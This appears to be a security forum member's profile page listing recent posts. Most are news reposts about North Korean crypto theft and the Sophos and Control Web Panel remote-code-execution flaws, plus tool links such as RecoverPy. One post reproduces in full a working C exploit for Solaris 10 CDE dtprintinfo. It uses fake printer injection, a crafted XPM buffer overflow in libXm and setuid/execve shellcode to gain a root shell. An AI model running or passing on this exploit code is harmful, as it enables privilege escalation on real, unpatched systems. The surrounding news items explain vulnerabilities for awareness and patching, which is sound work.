Jump to content


Active Members
  • Posts

  • Joined

  • Days Won


Kev last won the day on January 22

Kev had the most liked content!


415 Excellent


About Kev

  • Rank

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Salut, il mai are cineva?
  2. Tally.Work is an AI cover letter generator that creates a cover letter from your resume and a job description in seconds. It's intuitive, saves you time and works great as a starting point. URL: https://tally.work Via Google
  3. North Korea-linked hackers stole $1.7bn of cryptocurrency in 2022 North Korea-backed hackers stole $1.7bn (£1.4bn) of crypto in 2022, says blockchain analysis firm Chainalysis. This nearly quadruples the country's previous record for cryptocurrency theft - $429m in 2021. The loot also made up 44% of the $3.8bn stolen in crypto hacks last year, which the firm called "the biggest year ever for crypto hacking". Experts have said the country, facing heavy sanctions, is turning to crypto theft to fund its nuclear arsenal. North Korea has conducted six nuclear tests and analysts expect the seventh one this year, as the country accelerates its nuclear weapons programme under leader Kim Jong-un. Last year, Pyongyang launched a record number of ballistic and other missiles. This is despite the country's struggling economy. These hackers typically launder crypto through "mixers", which blend cryptocurrencies from various users to obfuscate the origins of the funds, the firm said. Other experts have also said that North Korea launders stolen crypto through brokers in China and non-fungible tokens (NFTs). Last month, the FBI confirmed that North Korea-affiliated Lazarus Group was responsible for a $100m crypto heist on a blockchain network called Horizon bridge last year. Overall, decentralised finance protocols, or DeFi, accounted for over 82% of cryptocurrency stolen in 2022, Chainalysis' report said. DeFi users know what will happen to their funds when they use them because smart contract codes governing these protocols are publicly accessible by default. But this transparency also makes DeFi particularly attractive to hackers, who can scan the codes for vulnerabilities and "strike at the perfect time" to maximise their loot, according to the report. David Schwed, chief operating officer at blockchain security firm Halborn, noted that DeFi developers "prioritise growth over all else", and funds that could be used to enhance security are often directed instead to rewards, in order to attract users. DeFi developers can take a leaf from traditional financial institutions in making their platforms more secure, Mr Schwed said. For instance, they can simulate different hacking scenarios to test their protocols, or design mechanisms to pause or halt transactions when suspicious activity is detected. "You don't need to move as slow as a bank, but you can borrow from what banks do," he said. Via bbc.com
  4. Kev

    MAC Address Search

    Link: https://mac.lc gãsit pe bing.com
  5. Monzo, Monese, d/astea de 2 lei... instant inclusv Transivlavia Revolut....
  6. Iar incepem? Track1,2,3--- Cu grija, mai bine intrebi cum nu-ti fura
  7. Solaris 10 CDE local privilege escalation exploit that achieves root by injecting a fake printer via lpstat and uses a buffer overflow in libXM ParseColors(). /* * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info> * * "What has been will be again, * what has been done will be done again; * there is nothing new under the Sun." * -- Ecclesiastes 1:9 * * #Solaris #CDE #0day #ForeverDay #WontFix * * This exploit illustrates yet another way to abuse the infamous dtprintinfo * binary distributed with the Common Desktop Environment (CDE), a veritable * treasure trove for bug hunters since the 1990s. It's not the most reliable * exploit I've ever written, but I'm quite proud of the new vulnerabilities * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January * 2021) applied. The exploit chain is structured as follows: * 1. Inject a fake printer via the printer injection bug I found in lpstat. * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors(). * 3. Enjoy root privileges! * * For additional details on my bug hunting journey and on the vulnerabilities * themselves, you can refer to the official advisory: * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt * * Usage: * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall * $ ./raptor_dtprintlibXmas * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info> * * Using SI_PLATFORM : i86pc (5.10) * Using stack base : 0x8047fff * Using safe address : 0x8045790 * Using rwx_mem address : 0xfeffa004 * Using sc address : 0x8047fb4 * Using sprintf() address : 0xfefd1250 * Path of target binary : /usr/dt/bin/dtprintinfo * * On your X11 server: * 1. Select the "fnord" printer, then click on "Selected" > "Properties". * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu. * * Back to your original shell: * # id * uid=0(root) gid=1(other) * * IMPORTANT NOTE. * The buffer overflow corrupts some critical variables in memory, which we * need to fix. In order to do so, we must patch the hostile buffer at some * fixed locations with the first argument of the last call to ParseColors(). * The easiest way to get such a safe address is via the special 0x41414141 * command-line argument and truss, as follows: * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 0x41414141 2>OUT * $ grep ParseColors OUT | tail -1 * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724) * ^^^^^^^^^ << this is the safe address we need * * Tested on: * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021) * [previous Solaris versions are also likely vulnerable] */ #include <fcntl.h> #include <link.h> #include <procfs.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/stat.h> #include <sys/systeminfo.h> #define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE" #define INFO2 "Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>" #define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program #define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging #define BUFSIZE 1106 // size of hostile buffer #define PADDING 1 // hostile buffer padding #define SAFE 0x08045770 // 1st arg to ParseColors() char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */ /* triple setuid() */ "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" /* execve() */ "\x31\xc0\x50\x68/ksh\x68/bin" "\x89\xe3\x50\x53\x89\xe2\x50" "\x52\x53\xb0\x3b\x50\xcd\x91"; /* globals */ char *arg[2] = {"foo", NULL}; char *env[256]; int env_pos = 0, env_len = 0; /* prototypes */ int add_env(char *string); void check_bad(int addr, char *name); int get_env_addr(char *path, char **argv); int search_ldso(char *sym); int search_rwx_mem(void); void set_val(char *buf, int pos, int val); /* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], cmd[1024], *vuln = VULN; char platform[256], release[256], display[256]; int i, sc_addr, safe_addr = SAFE; FILE *fp; int sb = ((int)argv[0] | 0xfff); // stack base int ret = search_ldso("sprintf"); // sprintf() in ld.so.1 int rwx_mem = search_rwx_mem(); // rwx memory /* helper that prints argv[0] address, used by get_env_addr() */ if (!strcmp(argv[0], arg[0])) { printf("0x%p\n", argv[0]); exit(0); } /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* process command line */ if ((argc < 2) || (argc > 3)) { fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n", argv[0]); exit(1); } snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]); if (argc > 2) { safe_addr = (int)strtoul(argv[2], (char **)NULL, 0); } /* enter debug mode */ if (safe_addr == 0x41414141) { unlink(DEBUG); snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG); if (system(cmd) == -1) { perror("error creating debug binary"); exit(1); } vuln = DEBUG; } /* fill envp while keeping padding */ add_env("LPDEST=fnord"); // injected printer add_env("HOME=/tmp"); // home directory add_env("PATH=/usr/bin:/bin"); // path sc_addr = add_env(display); // x11 display add_env(sc); // shellcode add_env(NULL); /* calculate shellcode address */ sc_addr += get_env_addr(vuln, argv); /* inject a fake printer */ unlink("/tmp/.printers"); unlink("/tmp/.printers.new"); if (!(fp = fopen("/tmp/.printers", "w"))) { perror("error injecting a fake printer"); exit(1); } fprintf(fp, "fnord :\n"); fclose(fp); link("/tmp/.printers", "/tmp/.printers.new"); /* craft the hostile buffer */ bzero(buf, sizeof(buf)); for (i = PADDING; i < BUFSIZE - 16; i += 4) { set_val(buf, i, ret); // sprintf() set_val(buf, i += 4, rwx_mem); // saved eip set_val(buf, i += 4, rwx_mem); // 1st arg set_val(buf, i += 4, sc_addr); // 2nd arg } memcpy(buf, "\"c c ", 5); // beginning of hostile buffer buf[912] = ' '; // string separator set_val(buf, 1037, safe_addr); // safe address set_val(buf, 1065, safe_addr); // safe address set_val(buf, 1073, 0xffffffff); // -1 /* create the hostile XPM icon files */ system("rm -fr /tmp/.dt"); mkdir("/tmp/.dt", 0755); mkdir("/tmp/.dt/icons", 0755); if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) { perror("error creating XPM icon files"); exit(1); } fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf); fclose(fp); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm"); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm"); /* print some output */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret); fprintf(stderr, "Path of target binary\t: %s\n\n", vuln); /* check for badchars */ check_bad(safe_addr, "safe address"); check_bad(rwx_mem, "rwx_mem address"); check_bad(sc_addr, "sc address"); check_bad(ret, "sprintf() address"); /* run the vulnerable program */ execve(vuln, arg, env); perror("execve"); exit(0); } /* * add_env(): add a variable to envp and pad if needed */ int add_env(char *string) { int i; /* null termination */ if (!string) { env[env_pos] = NULL; return env_len; } /* add the variable to envp */ env[env_pos] = string; env_len += strlen(string) + 1; env_pos++; /* pad envp using zeroes */ if ((strlen(string) + 1) % 4) for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { env[env_pos] = string + strlen(string); env_len++; } return env_len; } /* * check_bad(): check an address for the presence of badchars */ void check_bad(int addr, char *name) { int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP for (i = 0; i < sizeof(bad) / sizeof(int); i++) { if (((addr & 0xff) == bad[i]) || ((addr & 0xff00) == bad[i]) || ((addr & 0xff0000) == bad[i]) || ((addr & 0xff000000) == bad[i])) { fprintf(stderr, "error: %s contains a badchar\n", name); exit(1); } } } /* * get_env_addr(): get environment address using a helper program */ int get_env_addr(char *path, char **argv) { char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; char hex[11]; int fd[2], addr; /* truncate program name at correct length and create a hard link */ prog[strlen(path)] = '\0'; unlink(prog); link(argv[0], prog); /* open pipe to read program output */ if (pipe(fd) == -1) { perror("pipe"); exit(1); } switch(fork()) { case -1: /* cannot fork */ perror("fork"); exit(1); case 0: /* child */ dup2(fd[1], 1); close(fd[0]); close(fd[1]); execve(prog, arg, env); perror("execve"); exit(1); default: /* parent */ close(fd[1]); read(fd[0], hex, sizeof(hex)); break; } /* check address */ if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) { fprintf(stderr, "error: cannot read address from helper\n"); exit(1); } return addr + strlen(arg[0]) + 1; } /* * search_ldso(): search for a symbol inside ld.so.1 */ int search_ldso(char *sym) { int addr; void *handle; Link_map *lm; /* open the executable object file */ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { perror("dlopen"); exit(1); } /* get dynamic load information */ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { perror("dlinfo"); exit(1); } /* search for the address of the symbol */ if ((addr = (int)dlsym(handle, sym)) == NULL) { fprintf(stderr, "sorry, function %s() not found\n", sym); exit(1); } /* close the executable object file */ dlclose(handle); return addr; } /* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */ int search_rwx_mem(void) { int fd; char tmp[16]; prmap_t map; int addr = 0, addr_old; /* open the proc filesystem */ sprintf(tmp,"/proc/%d/map", (int)getpid()); if ((fd = open(tmp, O_RDONLY)) < 0) { fprintf(stderr, "can't open %s\n", tmp); exit(1); } /* search for the last RWX memory segment before stack (last - 1) */ while (read(fd, &map, sizeof(map))) if (map.pr_vaddr) if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { addr_old = addr; addr = map.pr_vaddr; } close(fd); /* add 4 to the exact address NUL bytes */ if (!(addr_old & 0xff)) addr_old |= 0x04; if (!(addr_old & 0xff00)) addr_old |= 0x0400; return addr_old; } /* * set_val(): copy a dword inside a buffer (little endian) */ void set_val(char *buf, int pos, int val) { buf[pos] = (val & 0x000000ff); buf[pos + 1] = (val & 0x0000ff00) >> 8; buf[pos + 2] = (val & 0x00ff0000) >> 16; buf[pos + 3] = (val & 0xff000000) >> 24; } Source
  8. Exploiting vulnerability with 9.8 severity rating isn't particularly hard. More than 4,400 Internet-exposed servers are running versions of the Sophos Firewall that’s vulnerable to a critical exploit that allows hackers to execute malicious code, a researcher has warned. CVE-2022-3236 is a code-injection vulnerability allowing remote code execution in the User Portal and Webadmin of Sophos Firewalls. It carries a severity rating of 9.8 out of 10. When Sophos disclosed the vulnerability last September, the company warned it had been exploited in the wild as a zero-day. The security company urged customers to install a hotfix and, later on, a full-blown patch to prevent infection. According to recently published research, more than 4,400 servers running the Sophos firewall remain vulnerable. That accounts for about 6 percent of all Sophos firewalls, security firm VulnCheck said, citing figures from a search on Shodan. The researcher said he was able to create a working exploit for the vulnerability based on technical descriptions in this advisory from the Zero Day Initiative. The research's implicit warning: Should exploit code become public, there’s no shortage of servers that could be infected. Baines urged Sophos firewall users to ensure they’re patched. He also advised users of vulnerable servers to check for two indicators of possible compromise. The first is the log file located at: /logs/csc.log, and the second is /log/validationError.log. When either contains the_discriminator field in a login request, there likely was an attempt, successful or otherwise, to exploit the vulnerability, he said. The silver lining in the research is that mass exploitation isn’t likely because of a CAPTCHA that must be completed during authentication by web clients. In a statement, Sophos officials wrote: "Sophos took immediate steps to remediate this issue with an automated hotfix sent out in September 2022. We also alerted users who don't receive automatic hotfixes to apply the update themselves. The remaining 6% of the Internet-facing versions that Baines is guestimating in his article are running old, unsupported version of the software. This is a good opportunity to remind these users, as well as all users of any type of outdated software, to follow best security practices and upgrade to the most recent version available, like Sophos does on a regular basis with its customers." Via arstechnica.com
  9. RecoverPy RecoverPy is a powerful tool that leverages your system capabilities to recover lost files. Unlike others, you can not only recover deleted files but also overwritten data. Every block of your partition will be scanned. You can even find a string in binary files. Demo Installation RecoverPy is currently only available on Linux systems. Dependancies Mandatory: To list and search through your partitions, recoverpy uses grep, dd, and lsblk commands. Although, if you're running a major Linux distrucition these tools should already be installed. Optional: To display real time grep progress, you can install progress. To install all dependencies: Debian-like: apt install grep coreutils util-linux progress Arch: pacman -S grep coreutils util-linux progress Fedora: dnf install grep coreutils util-linux progress Installation from pip python3 -m pip install recoverpy Usage python3 -m recoverpy You must be root or use sudo. Select the system partition in which your file was. If you are out of luck, you can alternatively search in your home partition, maybe your IDE, text editor, etc. made a backup at some point. Type a text string to search. See tips below for better results. Start search, Results will appear in the left-hand box. Select a result. Once you have found your precious, select Open. You can now either save this block individually or explore neighboring blocks for the remaining parts of the file. You could then save it all in one file. Tips Always do backups! Yes, maybe too late... Unmount your partition before you do anything! Although you can search with your partition still mounted, it is highly recommended to unmount your partition to avoid any alteration to your file. Regarding the searched string: Be concise, find something that could be unique to your file. Stay simple, your string is escaped but exotic characters may affect your results. Try to remember the last edit you have made to your file. When you have found your file: You might see multiple results. Your system often use different partion blocks to save successive versions of a file. Make sure you've found the last version. Try exploring neighboring blocks to be sure to save your whole file. Contributing Thank you for considering contributing to RecoverPy. Any request, bug report or PR are welcome. Please read the contributing guide. Download: RecoverPy-main.zip or git clone https://github.com/PabloLec/RecoverPy.git Source: github.com
  10. A patch was released in October, but not all servers have installed it. Malicious hackers have begun exploiting a critical vulnerability in unpatched versions of the Control Web Panel, a widely used interface for web hosting. “This is an unauthenticated RCE,” members of the Shadowserver group wrote on Twitter, using the abbreviation for remote code exploit. “Exploitation is trivial and a PoC published.” PoC refers to a proof-of-concept code that exploits the vulnerability. The vulnerability is tracked as CVE-2022-44877. It was discovered by Numan Türle of Gais Cyber Security and patched in October in version Advisories didn’t go public until earlier this month, however, making it likely some users still aren’t aware of the threat. Figures provided by Security firm GreyNoise show that attacks began on January 7 and have slowly ticked up since then, with the most recent round continuing through Wednesday. The company said the exploits are coming from four separate IP addresses located in the US, Netherlands, and Thailand. Shadowserver shows that there are roughly 38,000 IP addresses running Control Web Panel, with the highest concentration in Europe, followed by North America and Asia. The severity rating for CVE-2022-44877 is 9.8 out of a possible 10. “Bash commands can be run because double quotes are used to log incorrect entries to the system,” the advisory for the vulnerability stated. As a result, unauthenticated hackers can execute malicious commands during the login process. The following video demonstrates the flow of the exploit. Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877 The vulnerability resides in the /login/index.php component and resulted from CWP using a faulty structure when logging incorrect entries, according to the Daily Swig. The structure is: echo "incorrect entry, IP address, HTTP_REQUEST_URI" >> /blabla/wrong.log. “Since the request URI comes from the user, and as you can see it is within double quotes, it is possible to run commands such as $(blabla), which is a bash feature,” Türle told the publication. Given the ease and severity of exploitation and the availability of working exploit code, organizations using Control Web Panel should ensure they’re running version or higher. Via arstechnica.com
  11. https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-january-2023 Succes! Credit: Jessica Haworth
  12. Link :https://www.fly.faa.gov/adv/advADB.jsp Via Google
  13. Mesaj catre ISP Eu: ISP: Eu: ISP: Scuze pentru dublu post, am zis ca nu apare notificare pentru edit
  14. Kev


    Url: https://www.compart.com/en/unicode/ Enjoy! P.S. Gasit pe google
  • Create New...